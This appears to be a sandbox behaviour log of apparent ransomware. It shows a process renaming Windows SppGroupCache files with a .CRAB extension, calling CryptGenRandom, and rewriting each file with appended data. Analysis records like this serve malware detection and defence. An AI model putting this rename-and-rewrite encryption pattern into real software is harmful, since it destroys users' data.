File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 272 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 272 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 272 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 56384 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 432 True 1
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
